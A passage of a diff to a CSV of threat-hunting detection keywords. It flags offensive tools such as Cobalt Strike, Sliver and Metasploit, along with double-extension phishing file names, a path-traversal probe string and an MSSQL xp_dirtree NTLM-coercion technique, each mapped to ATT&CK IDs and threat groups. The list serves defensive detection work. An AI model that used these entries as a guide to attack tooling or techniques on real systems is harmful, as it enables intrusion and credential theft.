APT29","C2","https://github.com/Unknow101/FuckThatPacker","1","0","N/A","10","10","612","91","2022-04-03T18:20:01Z","2020-08-13T07:26:07Z" @@ -2483,12 +2483,12 @@ "*.sh *--checksec*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" "*.sh *cvelist-file:*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" "*.sharpgen *","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","0","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" -"*.ShellcodeRDI*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*.ShellcodeRDI*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" "*.sites.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" -"*.SliverRPC/*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" +"*.SliverRPC/*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" "*.smtp.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.ssl.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" -"*.stage.123456.*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","820","138","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*.stage.123456.*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" "*.stage.123456.*","offensive_tool_keyword","cobaltstrike","dns beacons - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","dns query field","10","10","N/A","N/A","N/A","N/A" "*.static.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.status.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" @@ -2509,12 +2509,12 @@ "*.txt.vbs*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*.unconstrained.txt*","offensive_tool_keyword","msldapdump","LDAP enumeration tool implemented in Python3","T1018 - T1210.001","TA0007 - TA0001","N/A","N/A","Reconnaissance","https://github.com/dievus/msLDAPDump","1","1","N/A","N/A","3","205","27","2023-08-14T13:15:29Z","2022-12-30T23:35:40Z" "*.videos.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" -"*.villain_core*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3252","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*.villain_core*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" "*.vpn.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.webmail.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.wiki.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" -"*.win10.config.fireeye*","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","1","N/A","N/A","10","6323","1248","2023-10-03T19:02:49Z","2019-03-26T22:36:32Z" -"*.win7.config.fireeye*","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","1","N/A","N/A","10","6323","1248","2023-10-03T19:02:49Z","2019-03-26T22:36:32Z" +"*.win10.config.fireeye*","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","1","N/A","N/A","10","6326","1249","2023-10-03T19:02:49Z","2019-03-26T22:36:32Z" +"*.win7.config.fireeye*","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","1","N/A","N/A","10","6326","1249","2023-10-03T19:02:49Z","2019-03-26T22:36:32Z" "*.xls.bat*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*.xls.dll*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*.xls.exe*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" @@ -2533,18 +2533,19 @@ "*.xlsx.vbs*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*.xp_dirtree *\*","offensive_tool_keyword","AD exploitation cheat sheet","If you have low-privileged access to a MSSQL database and no links are present you could potentially force NTLM authentication by using the xp_dirtree stored procedure to access this share. If this is successful the NetNTLM for the SQL service account can be collected and potentially cracked or relayed to compromise machines as that service account.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/#kali-installer-images*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/*_priv_esc.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/*SandboxEscapes/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/../../../../../boot.ini*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*/*_priv_esc.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/*SandboxEscapes/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - 